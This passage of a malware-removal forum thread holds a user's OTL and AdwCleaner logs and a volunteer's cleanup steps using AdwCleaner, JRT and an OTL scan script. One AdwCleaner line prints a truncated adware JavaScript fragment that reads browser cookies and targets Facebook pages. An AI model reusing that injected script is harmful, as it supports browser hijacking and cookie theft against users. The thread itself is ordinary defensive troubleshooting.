O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [BCSSync] C:\Program Files\Microsoft Office\Office14\BCSSync.exe (Microsoft Corporation)
O4 - HKLM..\Run: [CTHelper] C:\Windows\System32\CtHelper.exe (Creative Technology Ltd)
O4 - HKLM..\Run: [DivXMediaServer] C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe (DivX, LLC)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [RtHDVCpl] C:\Windows\RtHDVCpl.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [Symantec PIF AlertEng] C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe (Symantec Corporation)
O4 - HKCU..\Run: [HostsMan] C:\Program Files\HostsMan\hm.exe (abelhadigital.com)
O4 - HKCU..\Run: [OpenDNS Updater] C:\Program Files\OpenDNS Updater\OpenDNSUpdater.exe ()
O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (SUPERAntiSpyware)
O4 - Startup: C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O8 - Extra context menu item: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O13 - gopher Prefix: missing
O16 - DPF: {05317530-B882-449D-9421-18D94FA3ED34} http://www.sis.com/ocis/OSInfo.cab (OSInfo Control)
O16 - DPF: {16095503-786F-4097-AED6-5D567A26D760} http://www.sis.com/o...utodetectNT.cab (SiS_OCX Control)
O16 - DPF: {44990B00-3C9D-426D-81DF-AAB636FA4345} https://www-secure.s...abs/tgctlcm.cab (Reg Error: Key error.)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...r/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} http://www.adobe.com...obat/nos/gp.cab (get_atlcom Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creat...13/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creat...015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creat...21022/CTPID.cab (Creative Software AutoUpdate Support Package)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{78665C2D-46DF-4788-BFC2-B06EFD46D2C3}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9AF3476A-ABC9-4638-B175-8F534F2EE741}: DhcpNameServer = 192.168.9.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B0239C4C-5501-4BF0-9987-C91B97BE81B2}: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BBBE3A5C-8D11-413B-B0EC-06F6820506B2}: DhcpNameServer = 208.67.222.222
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: NameServer = 208.67.222.222,208.67.220.220
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\!SASWinLogon: DllName - (C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL) - C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
O24 - Desktop WallPaper: D:\My Documents\bettiedesk.bmp
O24 - Desktop BackupWallPaper: D:\My Documents\bettiedesk.bmp
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006/09/18 17:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O32 - AutoRun File - [2000/12/18 09:44:14 | 000,000,081 | ---- | M] () - F:\AUTOEXEC.BAT -- [ NTFS ]
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell\AutoRun\command - "" = M:\LaunchU3.exe -a
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell - "" = AutoRun
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell\AutoRun\command - "" = J:\CTRun\Start.EXE
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell\AutoRun\command - "" = K:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/05/20 08:34:41 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:07:25 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Oracle
[2014/05/19 22:07:05 | 000,000,000 | ---D | C] -- C:\Windows\Sun
[2014/05/19 22:06:26 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/05/19 22:05:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/05/19 20:16:10 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/05/19 12:37:29 | 000,000,000 | ---D | C] -- C:\aa8e0b99a77696e8ab0e55
[2014/05/19 12:09:02 | 000,000,000 | ---D | C] -- C:\Windows\Migration
[2014/05/19 12:02:31 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2014/05/19 11:52:08 | 000,000,000 | ---D | C] -- C:\Windows\System32\MRT
[2014/05/19 10:45:52 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\DropboxMaster
[2014/05/19 10:36:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TRENDnet
[2014/05/19 10:36:52 | 000,430,080 | ---- | C] (Realtek) -- C:\Windows\SwUSB.exe
[2014/05/19 10:36:52 | 000,025,896 | ---- | C] (Windows ® Codename Longhorn DDK provider) -- C:\Windows\System32\drivers\RtlProt.sys
[2014/05/19 10:36:49 | 000,000,000 | ---D | C] -- C:\Program Files\TRENDnet
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/05/20 10:01:00 | 000,642,740 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2014/05/20 10:01:00 | 000,119,932 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2014/05/20 09:57:00 | 000,000,886 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/20 09:54:32 | 000,000,882 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/20 09:53:43 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 09:53:43 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 09:53:27 | 000,067,584 | ---- | M] () -- C:\Windows\bootstat.dat
[2014/05/20 09:53:23 | 3220,758,528 | -HS- | M] () -- C:\hiberfil.sys
[2014/05/20 09:51:47 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXStateBkp-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,011,564 | ---- | M] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:56:51 | 000,000,266 | ---- | M] () -- C:\Windows\tasks\AutoKMS.job
[2014/05/19 21:18:40 | 000,000,275 | ---- | M] () -- C:\Windows\wininit.ini
[2014/05/19 20:35:59 | 000,431,917 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS
[2014/05/19 20:20:10 | 000,945,568 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS.bak
[2014/05/19 20:16:10 | 000,001,061 | ---- | M] () -- C:\Users\Ken\Desktop\Revo Uninstaller.lnk
[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:45:42 | 003,162,278 | ---- | M] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:43:20 | 000,381,216 | ---- | M] () -- C:\Windows\System32\FNTCACHE.DAT
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | M] () -- C:\Windows\System32\settings.sfm
[2014/05/19 12:39:10 | 000,445,016 | ---- | M] (Creative Labs) -- C:\Windows\System32\wrap_oal.dll
[2014/05/19 12:39:09 | 000,000,087 | RH-- | M] () -- C:\Windows\ctfile.rfc
[2014/05/19 12:06:34 | 000,002,057 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/05/19 11:20:19 | 000,001,975 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/19 10:46:11 | 000,000,953 | ---- | M] () -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2014/05/19 10:45:36 | 000,000,917 | ---- | M] () -- C:\Users\Ken\Desktop\Dropbox.lnk
[2014/05/19 10:36:53 | 000,001,810 | ---- | M] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | M] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/05/19 21:18:39 | 000,000,275 | ---- | C] () -- C:\Windows\wininit.ini
[2014/05/19 12:45:34 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.BAK
[2014/05/19 12:45:31 | 003,162,278 | ---- | C] () -- C:\Windows\{00000000-00000000-0000000D-00001102-00000004-00511102}.CDF
[2014/05/19 12:40:12 | 000,029,820 | ---- | C] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,011,564 | ---- | C] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settingsbkup.sfm
[2014/05/19 12:40:12 | 000,001,080 | ---- | C] () -- C:\Windows\System32\settings.sfm
[2014/05/19 11:11:50 | 000,218,228 | ---- | C] () -- C:\Windows\System32\WFP.TMF
[2014/05/19 10:36:53 | 000,001,810 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Configuration Utility.lnk
[2014/05/19 10:36:53 | 000,001,792 | ---- | C] () -- C:\Users\Public\Desktop\Wireless Configuration Utility.lnk
[2014/05/19 10:36:52 | 000,036,864 | ---- | C] () -- C:\Windows\runSW.exe
[2011/04/13 09:54:46 | 000,000,000 | ---- | C] () -- C:\Users\Ken\AppData\Roaming\wklnhst.dat
[2010/12/20 22:50:46 | 014,835,712 | ---- | C] () -- C:\ProgramData\sandra.mda
[2010/09/19 03:06:28 | 000,001,356 | ---- | C] () -- C:\Users\Ken\AppData\Local\d3d9caps.dat
[2009/02/04 01:21:42 | 000,000,000 | ---- | C] () -- C:\ProgramData\LauncherAccess.dt
[2008/01/09 20:34:03 | 000,817,982 | ---- | C] () -- C:\ProgramData\LUUnInstall.LiveUpdate
[2008/01/02 18:37:37 | 000,000,132 | ---- | C] () -- C:\Users\Ken\BackupResult.DAT
[2008/01/02 17:50:03 | 000,004,608 | ---- | C] () -- C:\Users\Ken\Drive_K.BJF
[2007/12/05 11:52:50 | 000,141,824 | ---- | C] () -- C:\Users\Ken\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2007/12/04 11:33:31 | 007,602,176 | ---- | C] () -- C:\Users\Ken\NTUSER.bak
 
========== ZeroAccess Check ==========
 
[2006/11/02 08:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/25 09:26:04 | 011,587,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009/04/11 02:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/04/11 02:28:25 | 000,347,648 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
========== LOP Check ==========
 
[2010/09/15 14:32:25 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\abelhadigital.com
[2007/12/04 11:40:14 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Acer
[2011/10/01 12:24:48 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\DAEMON Tools Lite
[2014/05/20 09:55:48 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Dropbox
[2014/05/19 10:45:56 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\DropboxMaster
[2010/08/19 20:11:19 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\FreeBurner
[2012/04/11 14:42:57 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\ImgBurn
[2007/12/04 11:40:13 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Leadertech
[2009/02/07 00:55:34 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Leawo
[2012/05/30 21:05:34 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Motorola
[2012/05/30 21:07:14 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Motorola Mobility
[2011/10/01 12:04:03 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\OpenDNS Updater
[2014/05/19 22:07:25 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Oracle
[2009/02/04 18:42:57 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Samsung
[2009/03/14 18:20:29 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Skinux
[2010/11/11 19:45:48 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\TeamViewer
[2011/04/13 09:54:47 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Template
[2010/11/26 00:13:46 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Thunderbird
[2011/03/17 22:56:32 | 000,000,000 | ---D | M] -- C:\Users\Ken\AppData\Roaming\Tific
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 104 bytes -> C:\ProgramData\TEMP:5C321E34

< End of report >
 

 


  • 0

Advertisements

#2
Valinorum
Posted 20 May 2014 - 09:18 AM

Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)

:welcome:

My name is Valinorum and I will be the acolyte today. Before we proceed, please, acknowledge yourself the following(s):
  • Please do not create any new threads on this while we are working on your system as it wastes another volunteer's time. If you are being helped/have solved the issue/no longer wish to continue, notify me in your reply and I will quickly close this thread. Failing to comply will result in denial of future assistance.
  • Please do not install any new software while we are working on this system as it may hinder our process.
  • Malware removal is a complicated process so don't stop following the steps even if the symptoms are not found. Keep up with me until I declare you clean.
  • Please do not try to fix anything without being ask.
  • Please do not attach your logs or put them inside code/quote tags. Do a Copy/Paste of the entire contents of the log file and submit it inside your post unless directed otherwise.
  • Please print or save the instructions I give you for quick reference. We may be using Safe mode which will cut you off from internet and you will not always be able to access this thread.
  • Back up your data. I will not knowingly suggest your any course that might damage your system but sometimes Malware infections are so severe that only option we have is to re-format and re-install the operating system.
  • If you are confused about any instruction stop and ask. Do not keep on going.
  • Do not repeat the steps if you face any problems.
  • I am not an omniscient. There are things even I cannot foresee. But what I know took years to learn and perfect the skill. This site is run by volunteers who help people in need in their own free time. I would ask you to respect their time and be patient as sometimes real life demands our time and replies to you can be delayed.
  • Private Message(PM) if and only if I have not responded to your thread within three days or your query is offtopic and personal. Do not PM me under any other circumstances. Your thread is the only medium of communication.
  • The fixes are for your system only. Please refrain from using these fixes on other system as it may do serious damage.
 
  • Step #1 Fix with AdwCleaner
    • Download AdwCleaner by Xplode to your Desktop from the following link.
    • Right-click on AdwCleaner.exe and choose Run as administrator;
    • Click on Scan and let the program run unhindered;
    • When done, click on Clean and allow the system to reboot after it is done;
    • A log will be opened automatically after the restart;
    • Copy and Paste the contents of this log in your reply.
 
  • Step #2 Fix with Junkware Removal Tool
    Download Junkware Removal Tool by thisisu to your Desktop from the link below.
    Download Link 1
    Download Link 2
    • Disable your anti-virus to avoid potential conflicts. For more information please acknowledge yourself this article;
    • Run the program either by double-clicking(Windows XP) or Right-clicking and choosing Run as administrator(Windows Vista and above);
    • Please be patient as the tool cleans your system;
    • After completion of the process a log named JRT.txt will automatically open and is save to your Desktop;
    • Copy and Paste the contents of the log in your next reply.
 
  • Step #3 Scan with OTL
    • Re-run OTL.exe.
    • From the Extra Registry choose Use SafeList.
    • Copy and Paste the following code inside the Custom Scans/Fixes box;
      netsvcs
BASESERVICES
%SYSTEMDRIVE%\*.exe
dir "%systemdrive%\*" /S /A:L /C
/md5start
services.*
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
/md5stop
CREATERESTOREPOINT
    • Click the Run Scan button;
    • After the scan two logs will be produced;
    • Copy and paste the content of the logs in your next reply
 
  • Required Log(s):
    • AdwCleaner Log
    • Junkware Removal Tool Log
    • OTL Log(s) --
      • OTL.txt
      • Extras.txt
Regards,
Valinorum
  • 0

#3
Kenjesse
Posted 20 May 2014 - 11:58 AM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Thanks for the fast reply... doing scans now will post logs directly.


  • 0

#4
Kenjesse
Posted 20 May 2014 - 12:37 PM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Logs are as follows (there were 3 AdwCleaner logs)

 

 

# AdwCleaner v3.210 - Report created 20/05/2014 at 13:54:39
# Updated 19/05/2014 by Xplode
# Operating System : Windows Vista ™ Home Premium Service Pack 2 (32 bits)
# Username : Ken - KEN-HOME
# Running from : C:\Users\Ken\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Found : C:\Program Files\Conduit
Folder Found : C:\Program Files\SearchProtect
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog
Folder Found : C:\Users\Ken\AppData\Local\SwvUpdater
Folder Found : C:\Users\Ken\AppData\LocalLow\Conduit

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\Software\SmartBar
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{35B8892D-C3FB-4D88-990D-31DB2EBD72BD}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\SOFTWARE\Classes\driverscanner
Key Found : HKLM\SOFTWARE\Classes\Interface\{3F607E46-0D3C-4442-B1DE-DE7FA4768F5C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Found : HKLM\SOFTWARE\Classes\Interface\{FE0273D1-99DF-4AC0-87D5-1371C6271785}
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Found : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{93E3D79C-0786-48FF-9329-93BC9F6DC2B3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3097F293-D232-474E-ABEA-469F80D3A924}
Key Found : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B8671A7-FA01-4452-AB99-C4728E98247D}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3}
Key Found : HKLM\Software\Uniblue
Value Found : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]
Value Found : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [OpenDNS Updater]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{30CEEEA2-3742-40e4-85DD-812BF1CBB83D}]

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16545


-\\ Mozilla Firefox v4.0 (en-US)

[ File : C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\prefs.js ]

Line Found : user_pref("CT3279141_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1359865252627,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
Line Found : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "");
Line Found : user_pref("ct3279141.UserID", "UN28102926548955477");
Line Found : user_pref("extensions.510db82b7af87.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
Line Found : user_pref("smartbar.machineId", "Q1E1MICY+X/UYZGHUW8FG1RMXX7RAR9QXY7BWSTQPZAC+YJBB+8MDV05S8R2S730VTWVZ2HOLPQDDL9GVKHUNG");

-\\ Google Chrome v34.0.1847.137

[ File : C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Extension] : knfhfghnfdabbalddnnbdjmjomfgjbog

*************************

AdwCleaner[R0].txt - [4590 octets] - [20/05/2014 13:54:39]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [4650 octets] ##########
 

# AdwCleaner v3.210 - Report created 20/05/2014 at 13:55:20
# Updated 19/05/2014 by Xplode
# Operating System : Windows Vista ™ Home Premium Service Pack 2 (32 bits)
# Username : Ken - KEN-HOME
# Running from : C:\Users\Ken\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Found : C:\Program Files\Conduit
Folder Found : C:\Program Files\SearchProtect
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vaudix
Folder Found : C:\ProgramData\Vaudix
Folder Found : C:\ProgramData\Vaudix
